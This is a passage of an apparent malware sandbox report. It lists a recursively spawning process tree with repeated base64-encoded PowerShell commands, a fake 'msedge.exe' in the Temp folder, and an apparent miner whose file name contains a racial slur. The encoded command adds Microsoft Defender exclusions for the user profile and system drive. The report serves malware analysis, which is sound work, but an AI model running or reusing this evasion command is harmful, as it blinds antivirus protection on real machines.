        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        77⤵
        System Location Discovery: System Language Discovery
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        77⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        77⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        78⤵
        System Location Discovery: System Language Discovery
        
        PID:1160
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        78⤵
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        78⤵
        
        PID:2752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        79⤵
        
        PID:2596
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        79⤵
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        79⤵
        System Location Discovery: System Language Discovery
        
        PID:3992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        80⤵
        System Location Discovery: System Language Discovery
        
        PID:3520
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        80⤵
        
        PID:4032
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        80⤵
        
        PID:3548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        81⤵
        
        PID:1424
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        81⤵
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        81⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        82⤵
        System Location Discovery: System Language Discovery
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        82⤵
        
        PID:2428
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        82⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        83⤵
        System Location Discovery: System Language Discovery
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        83⤵
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        83⤵
        
        PID:2784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        84⤵
        
        PID:2488
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        84⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        84⤵
        
        PID:2772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        85⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        85⤵
        
        PID:1988
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        85⤵
        
        PID:1132
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        86⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        86⤵
        
        PID:1328
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        86⤵
        System Location Discovery: System Language Discovery
        
        PID:764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        87⤵
        System Location Discovery: System Language Discovery
        
        PID:3472
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        87⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        87⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        88⤵
        
        PID:1552
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        88⤵
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        88⤵
        
        PID:2448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        89⤵
        
        PID:1492
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        89⤵
        
        PID:2144
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        89⤵
        
        PID:3888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        90⤵
        System Location Discovery: System Language Discovery
        
        PID:1340
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        90⤵
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        90⤵
        System Location Discovery: System Language Discovery
        
        PID:2092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        91⤵
        
        PID:3500
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        91⤵
        
        PID:3444
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        91⤵
        System Location Discovery: System Language Discovery
        
        PID:1804
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        92⤵
        
        PID:2360
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        92⤵
        
        PID:3644
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        92⤵
        System Location Discovery: System Language Discovery
        
        PID:2984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        93⤵
        System Location Discovery: System Language Discovery
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        93⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        93⤵
        
        PID:3176
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        94⤵
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        94⤵
        
        PID:968
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        94⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        95⤵
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        95⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        95⤵
        
        PID:3844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        96⤵
        
        PID:3140
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        96⤵
        
        PID:2652
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        96⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        97⤵
        
        PID:3256
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        97⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        97⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        98⤵
        
        PID:568
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        98⤵
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        98⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        99⤵
        
        PID:3328
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        99⤵
        
        PID:1956
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        99⤵
        
        PID:2704
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        100⤵
        System Location Discovery: System Language Discovery
        
        PID:3232
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        100⤵
        
        PID:3216
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        100⤵
        System Location Discovery: System Language Discovery
        
        PID:2720
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        101⤵
        
        PID:3164
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        101⤵
        
        PID:2004
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        101⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        102⤵
        
        PID:3944
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        102⤵
        
        PID:916
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        102⤵
        
        PID:2024
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        103⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\msedge.exe
        
        "C:\Users\Admin\AppData\Local\Temp\msedge.exe"
        103⤵
        
        PID:3316
        
        C:\Users\Admin\AppData\Local\Temp\niggacoin.exe
        
        "C:\Users\Admin\AppData\Local\Temp\niggacoin.exe"
        103⤵
        
        PID:3488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AaABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAeQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AdAB4ACMAPgA="
        104⤵
        
        PID:1936
        
